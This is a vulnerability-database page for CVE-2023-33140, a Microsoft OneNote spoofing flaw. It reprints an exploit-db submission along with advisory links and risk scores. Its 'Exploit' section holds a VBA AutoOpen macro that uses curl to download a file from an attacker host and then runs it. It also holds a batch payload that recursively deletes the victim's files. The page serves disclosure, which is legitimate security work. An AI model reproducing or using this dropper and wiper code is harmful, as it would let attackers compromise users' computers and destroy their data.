Vulners
Lucene search
Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Microsoft Patch Tuesday June 2023: Edge type confusion, Git RCE, OneNote Spoofing, PGM RCE, Exchange RCE, SharePoint EoP | 25 Jun 202300:35 | – | avleonov |
 | The vulnerability of the Microsoft OneNote note-taking software, related to errors in information presentation on the user interface, allows a hacker to perform spoofing attacks. | 18 Jul 202300:00 | – | bdu_fstec |
 | CVE-2023-33140 | 14 Jun 202310:24 | – | circl |
 | Microsoft Office OneNote 安全漏洞 | 13 Jun 202300:00 | – | cnnvd |
 | CVE-2023-33140 | 13 Jun 202323:26 | – | cve |
 | CVE-2023-33140 Microsoft OneNote Spoofing Vulnerability | 13 Jun 202323:26 | – | cvelist |
 | Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing | 22 Jun 202300:00 | – | exploitdb |
 | EUVD-2023-37326 | 3 Oct 202520:07 | – | euvd |
 | KLA50318 Multiple vulnerabilities in Microsoft Office | 13 Jun 202300:00 | – | kaspersky |
 | Microsoft OneNote Spoofing Vulnerability | 13 Jun 202307:00 | – | mscve |
10
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub
```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spend:
01:15:00
--
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2023 00:00Current
7High risk
Vulners AI Score7
CVSS 3.16.5
EPSS0.05526
SSVC